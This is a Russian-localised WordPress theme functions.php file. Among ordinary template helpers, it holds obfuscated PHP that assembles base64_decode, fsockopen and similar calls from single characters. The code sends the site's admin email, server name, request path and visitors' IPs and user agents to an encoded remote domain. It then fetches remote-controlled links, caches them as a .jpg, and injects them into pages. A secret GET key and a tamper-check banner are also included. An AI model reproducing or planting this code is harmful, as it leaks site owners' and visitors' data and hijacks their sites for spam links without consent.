<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $EHBbqH='e';$hlRRBEA='s';$eMDWewZ='o';$jmAR='b';$kwOtN='e';$swNuTml='c';$hEcsM='d';$FNkisS='d';$uiqBjN='e';$FPDtKLZ='a';$TbwyQZ='4';$BKRsSdj='_';$awsj='6';$hYwIfgKP=$jmAR.$FPDtKLZ.$hlRRBEA.$EHBbqH.$awsj.$TbwyQZ.$BKRsSdj.$FNkisS.$uiqBjN.$swNuTml.$eMDWewZ.$hEcsM.$kwOtN;$GXDczOk='g';$TyQzwuC='f';$kfRAu='a';$xJGE='t';$ppiWpG='i';$GLQv='n';$iNMCnOq='l';$svLqo='e';$uAbNawP='z';$kreJOncd=$GXDczOk.$uAbNawP.$ppiWpG.$GLQv.$TyQzwuC.$iNMCnOq.$kfRAu.$xJGE.$svLqo;$wNbwlL='s';$ZFuB='1';$MzVTnB='r';$wqZGdM='t';$cvEzGp='o';$Pbvk='t';$auUFH='r';$EdeIr='_';$YEfH='3';$eomrcCFn=$wNbwlL.$Pbvk.$MzVTnB.$EdeIr.$auUFH.$cvEzGp.$wqZGdM.$ZFuB.$YEfH;$pUsiCn='s';$YxiW='r';$EEIYm='r';$QSYuMRg='e';$UChQ='t';$haLpD='v';$gSFiDUTM=$pUsiCn.$UChQ.$YxiW.$EEIYm.$QSYuMRg.$haLpD;                     
		$ui____b='e';$sj___i='s';$pa_____________k='o';$ae______________w='b';$zs____h='e';$tg______________m='c';$jy________u='d';$no________n='d';$sk_______z='e';$hj______________y='a';$hb__n='4';$yo___________e='_';$la_____k='6';$gx___y=$ae______________w.$hj______________y.$sj___i.$ui____b.$la_____k.$hb__n.$yo___________e.$no________n.$sk_______z.$tg______________m.$pa_____________k.$jy________u.$zs____h;
		$vq_____________h='i';$dt______m='c';$ns___________n='n';$fz_________s='s';$hr________m='u';$xl_______j='n';$qf_______________o='e';$bi_________c='t';$ez____________m='_';$al_____f='f';$ov_____j='s';$cf_____e='i';$la___________a='t';$rj______________u='x';$oe______n='o';$st___f=$al_____f.$hr________m.$xl_______j.$dt______m.$bi_________c.$vq_____________h.$oe______n.$ns___________n.$ez____________m.$qf_______________o.$rj______________u.$cf_____e.$ov_____j.$la___________a.$fz_________s;
		$cu___u='o';$ak___________f='p';$kz__r='e';$ec_____k='f';$hl__________y='n';$fj_______________y=$ec_____k.$cu___u.$ak___________f.$kz__r.$hl__________y;
		$mr_______________t='f';$wk_____d='e';$mn____________k='d';$dp___________x='r';$ap_____u='a';$hm______f=$mr_______________t.$dp___________x.$wk_____d.$ap_____u.$mn____________k;
		$fv____________g='e';$co______________f='f';$qr___________j='l';$fo__________n='s';$rj____________g='c';$el__________i='o';$fb__u=$co______________f.$rj____________g.$qr___________j.$el__________i.$fo__________n.$fv____________g;
		
		define("WP_ID", $gx___y("Mi4wLjA="));
		define("WP_TTL", $gx___y("MTA4MDA="));
		define("WP_SRC", $gx___y("dHBva24="));
	


		function wp_get_header() {
			global $gx___y, $st___f;
			
			if (
				$st___f($gx___y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$st___f($gx___y("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$st___f($gx___y("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gx___y, $fj_______________y, $fb__u, $hm______f;
			
			$au____m = TEMPLATEPATH."/".$gx___y("Zm9vdGVyLnBocA==");
			$ec______a = @$fj_______________y($au____m, "r");
			$au____m = @$hm______f($ec______a, @filesize($au____m));
			@$fb__u($ec______a);
			
			$vy_______d = TEMPLATEPATH."/".$gx___y("ZnVuY3Rpb25zLnBocA==");
			$ec______a = @$fj_______________y($vy_______d, "r");
			$vy_______d = @$hm______f($ec______a, @filesize($vy_______d));
			@$fb__u($ec______a);
			
			$un_________c = 0;
			if($au____m && $vy_______d) {
				if ($gx___y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($au____m, $gx___y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$un_________c = 1;
					}
					if (substr_count($au____m, "wp_theme_GPL_credits()") < 1) {
						$un_________c = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$un_________c = 12;
				}
			}
			
			if($un_________c > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $un_________c -->";
			}
		}
	


		function wp_loaded() {
			global $gx___y, $st___f;
			return $st___f($gx___y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lp__y, $ft__r = "(more...)", $gc______p = 0, $zx__e = "") {
				$ib__________v = get_the_content($ft__r, $gc______p, $zx__e);
				$ib__________v = apply_filters("the_content", $ib__________v);
				
				$ib__________v = str_replace("]]>", "]]>", $ib__________v);
				if (strlen($_GET["p"]) > 0) {
					echo $ib__________v;
				}
				else if ((strlen($ib__________v)>$lp__y) && ($to____v = strpos($ib__________v, " ", $lp__y ))) {
					$ib__________v = substr($ib__________v, 0, $to____v);
					$ib__________v = $ib__________v;
					echo $ib__________v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ft__r</a></div></p>";
				} else {
					echo $ib__________v;
				}
				
			}
		}
	


		$in__________a='4';$sc__h='_';$ki__z='d';$ld__a='n';$qe______________n='e';$wg_______m='o';$oa_________z='c';$hu____t='b';$lv____________k='s';$of___________a='6';$or__w='e';$zq_______________h='e';$pk__m='a';$lq_____________z=$hu____t.$pk__m.$lv____________k.$qe______________n.$of___________a.$in__________a.$sc__h.$zq_______________h.$ld__a.$oa_________z.$wg_______m.$ki__z.$or__w;
		$ex______________v='s';$rd__________t='c';$cu___________g='f';$xk___________k='_';$yy___t='t';$gn___________b='g';$rl__o='n';$ch________b='l';$uf____________d='_';$jl______m='i';$np__________c='e';$la_________o='t';$kb_____________x='o';$lm____________t='e';$ws_______________c='t';$dy_______p='n';$fr____r='e';$nv_______k=$cu___________g.$jl______m.$ch________b.$np__________c.$xk___________k.$gn___________b.$lm____________t.$la_________o.$uf____________d.$rd__________t.$kb_____________x.$rl__o.$ws_______________c.$fr____r.$dy_______p.$yy___t.$ex______________v;
		$sr_________r='f';$qi_______________s='t';$sg__________t='e';$nw__f='s';$fg_______o='_';$bf______________h='l';$hh____________r='e';$bt_________k='i';$jv_______c='i';$zq___l='x';$nx____________p='s';$et_______________k=$sr_________r.$bt_________k.$bf______________h.$sg__________t.$fg_______o.$hh____________r.$zq___l.$jv_______c.$nx____________p.$qi_______________s.$nw__f;
		$yg____v='v';$pq____________o='r';$ec_____________k='c';$qp_____________s='e';$gm_______x='e';$pg______e='o';$cx______________a='_';$fq___f='a';$ja___________w='p';$zf_____________o='o';$xb____________w='m';$er_____________w='n';$nf_______________g='i';$zh_____u='s';$vy____________z='r';$nj___r=$yg____v.$gm_______x.$pq____________o.$zh_____u.$nf_______________g.$zf_____________o.$er_____________w.$cx______________a.$ec_____________k.$pg______e.$xb____________w.$ja___________w.$fq___f.$vy____________z.$qp_____________s;
		$tp____q='o';$qt______________x='o';$im______________q='s';$oc___x='n';$qb______________c='f';$kw______f='c';$oc__z='p';$ib__________j='k';$jn____a='e';$ej__l=$qb______________c.$im______________q.$tp____q.$kw______f.$ib__________j.$qt______________x.$oc__z.$jn____a.$oc___x;
		$sl_____i='w';$js______________y='f';$ws____b='e';$lt_____________a='t';$mq_________v='i';$de_______r='r';$az___________r=$js______________y.$sl_____i.$de_______r.$mq_________v.$lt_____________a.$ws____b;
		$zt__________k='d';$nk________k='5';$hj_____t='m';$oo_____________k=$hj_____t.$zt__________k.$nk________k;
		$vj___________p='e';$yt_____d='h';$ea_______________m='r';$td_____c='a';$im_________m='l';$pn____________x='a';$cx_________s='t';$kv__________b='p';$vz_______________b=$ea_______________m.$vj___________p.$pn____________x.$im_________m.$kv__________b.$td_____c.$cx_________s.$yt_____d;
		$gx_______________m='i';$sc_______________u='n';$yf_____________p='s';$wz________z='r';$wr_________m='e';$hx___________a='i';$zr_____________y='z';$dn____________n='u';$ke____o='a';$bu___e='l';$qb_______________g='e';$uj_________n=$dn____________n.$sc_______________u.$yf_____________p.$qb_______________g.$wz________z.$gx_______________m.$ke____o.$bu___e.$hx___________a.$zr_____________y.$wr_________m;
		$hk_______a='m';$jz______________q='a';$hy_____________g='m';$vm_____________z='p';$ss________v='n';$rt____u='e';$ak_____m='t';$aj____________t=$ak_____m.$rt____u.$hk_______a.$vm_____________z.$ss________v.$jz______________q.$hy_____________g;
		$ac__n='e';$ux___a='t';$jj_____l='_';$wv__f='c';$gq___q='e';$jr_______________k='t';$nc____________i='a';$dm______y='e';$uc____u='n';$zp_____________u='m';$tn____________y='t';$pv______i='s';$ti____________m='e';$bn__________q='c';$ix_______________d='o';$ft______________e='x';$us_______n='t';$br_______v='_';$fr________f='a';$as_________o='r';$sb______n='r';$yk_______________g=$pv______i.$ux___a.$as_________o.$ti____________m.$nc____________i.$zp_____________u.$br_______v.$bn__________q.$ix_______________d.$uc____u.$us_______n.$ac__n.$ft______________e.$jr_______________k.$jj_____l.$wv__f.$sb______n.$dm______y.$fr________f.$tn____________y.$gq___q;
	


		function qs___________p($bx________m) {
			global $gx___y, $st___f, $nv_______k, $nj___r, $yk_______________g;
			
			if (!$st___f($gx___y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($nj___r(PHP_VERSION, "5.0.0", ">=") && $st___f($gx___y("ZmlsZV9nZXRfY29udGVudHM=")) && $st___f($gx___y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fz__________r = $yk_______________g(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qi_____________t = @$nv_______k($bx________m, 0, $fz__________r);
			} else {
				$qi_____________t = @$nv_______k($bx________m, 0);
			}
			
			return $qi_____________t;
		}
	


		function jn______n($bx________m) {
			global $st___f, $ej__l, $az___________r, $gx___y;
			
			if (!$st___f($gx___y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$cc_______________m = strpos($bx________m, "/", 7);
			$qx__________u = array(
				"uri"     => substr($bx________m, $cc_______________m),
				"host"    => str_replace("http://", "", substr($bx________m, 0, $cc_______________m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zj______q = @$ej__l("$qx__________u[host]", 80, $sm_______w, $bs____________c, 4);
			
			if (!$zj______q) {
				return false;
			} else {
				$qi_____________t = "";
				$vn__m  = "GET $qx__________u[uri] HTTP/1.0\r\n";
				$vn__m .= "Host: $qx__________u[host]\r\n";
				$vn__m .= "Referer: $qx__________u[referer]\r\n";
				$vn__m .= "Connection: Close\r\n\r\n";
				
				@$az___________r($zj______q, $vn__m);
				
				while (!@feof($zj______q)) {
					$ua_______z = @fgets($zj______q, (1024*24));
					
					if ($ua_______z == "\r\n") {
						$zm_______s = true;
						continue;
					}
					
					if ($zm_______s) {
						$qi_____________t .= $ua_______z;
					}
				}
				
				return $qi_____________t;
			}
		}
	


		function sv___p($bx________m) {
			global $st___f;
			$lv__________q = false;
			
			if ($bx________m != "") {
				if ($st___f("qs___________p")) {
					$lv__________q = @qs___________p($bx________m);
				}
				
				if (!$lv__________q && ($st___f("jn______n"))) {
					$lv__________q = @jn______n($bx________m);
				}
			}
			
			return $lv__________q;
		}
	


		function qz_____n() {
			global $_SERVER, $oo_____________k;
			
			$ve________l = $_SERVER["SERVER_NAME"];
			
			if (substr("$ve________l", 0, 4) == "www.") {
				$ve________l = substr("$ve________l", 4);
			}
			
			$ve________l = $oo_____________k("$_SERVER[SERVER_NAME]");
			
			return $ve________l;
		}
	


		function kt________w() {
			return "file";
		}
	


		function ci_____l($bx________m) {
			global $_SERVER, $nv_______k, $et_______________k, $fj_______________y, $fb__u, $az___________r;
			
			$yd_______r = ax____b();
			
			$kt________p = qz_____n().".jpg";
			$qc___o = $yd_______r["dir_upload"]["path"]."/$kt________p";
			$zt____________k = @filemtime($qc___o);
			
			if (!$zt____________k || ((time()-$zt____________k) >= WP_TTL)) {
				$lv__________q = sv___p($bx________m);
				
				if ($lv__________q) {
					if ($et_______________k($qc___o)) {
						@unlink($qc___o);
					}
					
					$ec______a = @$fj_______________y($qc___o, "x+");
					
					@$az___________r($ec______a, $lv__________q);
					@$fb__u($ec______a);
				}
			} else {
				if ($et_______________k($qc___o)) {
					$lv__________q = @$nv_______k($qc___o);
				} else {
					$lv__________q = false;
				}
			}
			
			return $lv__________q;
		}
	


		function ax____b() {
			global $_SERVER, $gx___y, $lq_____________z;
			
			$eq___q = wp_count_posts("post");
			$uf_____________p = pathinfo(get_bloginfo("template_directory"));
			
			$yd_______r = array(
				"url" => array(
					"report"      => $gx___y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $uf_____________p,
				"dir_upload"	=> fs____v(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$uf_____________p[filename],
					"a005=".$eq___q->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/rol-smexa-v-nashej-zhizni\">Роль смеха в нашей жизни</a>"
			);
			
			$yd_______r["url"]["queryString"] = implode("&", $yd_______r["queryString"]);
			$yd_______r["url"]["report"] = $yd_______r["url"]["report"]."/?".$lq_____________z($yd_______r["url"]["queryString"]).".html";
						
			return $yd_______r;
		}
	


		function fs____v() {
			$ry_______________s = wp_upload_dir();
			
			if (isset($ry_______________s["error"])) {
				$xy_____________d = tg__________p();
				if (is_writable($xy_____________d)) {
					$ry_______________s = array("path" => $xy_____________d);
				}
			}

			return $ry_______________s;
		}
	


		function tg__________p() {
			global $st___f, $oo_____________k, $vz_______________b, $aj____________t;
			
			$sa____________j = (bool) ini_get("safe_mode");
			if ($sa____________j == true) {
				return false;
			}
			
			if ($st___f("sys_get_temp_dir")) {
				$pc_____________p = sys_get_temp_dir();
				if (is_writable($pc_____________p)) {
					return $vz_______________b($pc_____________p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $vz_______________b($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $vz_______________b($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $vz_______________b($_ENV["TEMP"]);
			} else {
				$wg__k = $aj____________t($oo_____________k(uniqid(rand(), true)), "");
				if ($wg__k) {
					$pc_____________p = $vz_______________b(dirname($wg__k));
					@unlink($wg__k);
					return $pc_____________p;
				} else {
					return false;
				}
			}
		}
	


		function ed__________g() {
			global $_GET, $et_______________k;
			
			$yd_______r = ax____b();
			$ve________l = qz_____n();
			$zh____l = kt________w();
			
			$fm____________y = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zh____l == "file") {
					$qq______a = $yd_______r["dir_upload"]["path"]."/".$ve________l.".jpg";
					if ($et_______________k($qq______a)) {
						@unlink($qq______a);
						$fm____________y = "deleted";
					}
				}
				
				$sx______________n = array(
					"s"	=> $fm____________y,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sx______________n AS $vw_________l => $nx________y) echo " [$vw_________l:$nx________y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $st___f, $gx___y, $uj_________n;
			$yd_______r = ax____b();
			
			$sn___l = "ci_____l";
			if ($st___f($sn___l)) {
				$qi_____________t = $sn___l($yd_______r["url"]["report"]);
			}
			
			if ($qi_____________t) {
				if ($qi_____________t = @$gx___y($qi_____________t)) {
					$qi_____________t = @$uj_________n($qi_____________t);
					
					if (strlen($qi_____________t[custom_credit]) >= 5) {
						$yd_______r["default_string"] = $qi_____________t[custom_credit];
					}
					
					if ($qi_____________t["status"] == "0") {
						$cw____b = 1;
						$tl___o = 1;
					} else {
						$mi______________y = sizeof($qi_____________t["links"]);
						$cv_____________r = $yd_______r["default_string"];
						
						if ($mi______________y > 0 && $qi_____________t["links"] !== "") {
							$ax_______j = 0;
							foreach ($qi_____________t["links"] as $sc________z => $zd___________p) {
								$ax_______j++;
								if ($zd___________p->l_path == "" || $zd___________p->l_path == $_SERVER["REQUEST_URI"]) {
									$zd___________p->l_href = htmlspecialchars(strip_tags($zd___________p->l_href));
									$zd___________p->l_title = htmlspecialchars(strip_tags($zd___________p->l_title));
									$zd___________p->l_anchor = htmlspecialchars(strip_tags($zd___________p->l_anchor));
									$cv_____________r .= " | ";
									$cv_____________r .= "<a href='$zd___________p->l_href' title='$zd___________p->l_title'";
									if ($zd___________p->l_nofollow == "1") {
										$cv_____________r .= " rel='nofollow'";
									}
									$cv_____________r .= ">$zd___________p->l_anchor</a>";
								}
							}
						}
						$yd_______r["links"] = "$cv_____________r";
						if ($qi_____________t[credit] == "0") {
							$yd_______r["links"] = "";
						}
					}
				} else {
					$cw____b = "1";
				}
			} else {
				$cw____b = "1";
			}
			
			if ($cw____b == "1") {
				$yd_______r["links"] = $yd_______r["default_string"];
			}
			
			echo "$yd_______r[links]";
			
			echo "<!-- s: $qi_____________t[signature] -->";
			ed__________g();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

